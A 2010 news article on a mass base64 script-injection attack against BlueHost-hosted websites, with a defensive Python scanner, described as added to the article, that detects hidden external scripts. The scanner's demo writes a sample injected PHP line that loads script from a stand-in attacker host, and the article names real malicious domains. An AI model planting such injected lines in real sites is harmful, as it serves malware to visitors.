The CEO's blog was affected and left spreading malware

Jun 28, 2010 08:48 GMT  ·  By

Security researchers from web integrity monitoring services provider Sucuri warn that a new mass injection attack is targeting websites hosted at BlueHost. The company's own CEO, Matt Heaton, appears to be amongst the victims of this attack, having his blog compromised and left spreading rogueware.

The rogue code, which is added to the bottom of every page on compromised websites, is encoded in base64 to make it harder to spot. Unobfuscated, the code is a <script> element which points to http:// domainameat. cc/js2 .php [URL intentionally broken].

A directory of .html files called ".files" is also being created in the root folder of each compromised blog. Judging by their names, these pages are most likely used for black hat search engine optimization (BHSEO).
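The two indicators described above (a base64-encoded blob appended to page bodies that decodes to an external <script src>, and a ".files" directory in the web root) can be checked for with a small scanner. The following is an added example written for this article, not Sucuri's cleanup script; the web root layout, the page contents and the host names `evil-cdn.example` and `victim-blog.example` are constructed placeholders.

```python
import base64
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# A run of 40+ base64 characters is long enough to hide a <script> element.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src=['\"]?(https?://[^'\"\s>]+)", re.I)

def decode_candidates(text):
    """Yield every base64 blob in `text` that decodes to valid UTF-8 text."""
    for m in B64_RE.finditer(text):
        blob = m.group(0)
        blob += "=" * (-len(blob) % 4)  # repair padding stripped by the injector
        try:
            yield base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # random hashes / tokens: not text, not interesting

def hidden_script_hosts(page_text, own_host):
    """Return external hosts referenced by <script src> hidden inside base64 blobs."""
    hosts = set()
    for decoded in decode_candidates(page_text):
        for url in SCRIPT_SRC_RE.findall(decoded):
            host = urlparse(url).hostname or ""
            if host and host != own_host:
                hosts.add(host)
    return sorted(hosts)

def scan_site(root, own_host):
    """Walk a web root; report pages carrying hidden external scripts and a '.files' dir."""
    root = Path(root)
    findings = {"pages": {}, "dot_files_dir": (root / ".files").is_dir()}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in (".php", ".html", ".htm"):
            hosts = hidden_script_hosts(path.read_text(errors="replace"), own_host)
            if hosts:
                findings["pages"][str(path.relative_to(root))] = hosts
    return findings

def demo():
    """Build a constructed two-page site in a temp dir and scan it (sample data only)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        payload = '<script src="http://evil-cdn.example/js2.php"></script>'  # placeholder host
        blob = base64.b64encode(payload.encode()).decode()
        (root / "index.php").write_text("<html><body>Hello</body></html>\n"
                                        f'<?php echo base64_decode("{blob}"); ?>')
        (root / "about.html").write_text("<html><body>Clean page</body></html>")
        (root / ".files").mkdir()  # the BHSEO drop directory described in the article
        return scan_site(root, "victim-blog.example")
```

Run `demo()` to see the report for the constructed site; on a real web root call `scan_site(root, own_host)` and review every decoded blob by hand before deleting anything.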

The script on domainameat.cc, which was registered on Friday, sets cookies to track visitors and redirects them to a scareware distribution page hosted on workfree23.net [don't visit]. The cybercrooks running this FAKEAV taunt the researchers at ESET, the company developing NOD32 antivirus. According to a jsunpack analysis of the page, one of the div elements has an id of "hello_nod32_guys_how_u_doing".

"This attack seems very similar to the one that affected GoDaddy in the recent past," observes Sucuri researcher David Dede. The company, which runs a scanner that checks websites for malicious code, wrote a script to help webmasters clean up the affected websites. The script needs its extension changed to .php before being executed on the server.

As Mr. Dede already pointed out, a series of similar mass injection attacks has targeted various web hosting providers this year. In April, a large number of WordPress-based blogs hosted at Network Solutions had a rogue iframe injected into them. The security hole was subsequently determined to be improper file permissions.

Two weeks later, another wave of attacks left thousands of websites at the same hosting company compromised with malicious code. This time the injection was not limited only to WordPress blogs and also affected sites built on CMS platforms like Joomla!, as well as plain HTML ones.

Users are advised to always browse the Web with a capable and up-to-date antivirus solution installed on their computer. Firefox users can also use the NoScript extension to block third-party scripts loaded from external domains by default.

You can follow the editor on Twitter @lconstantin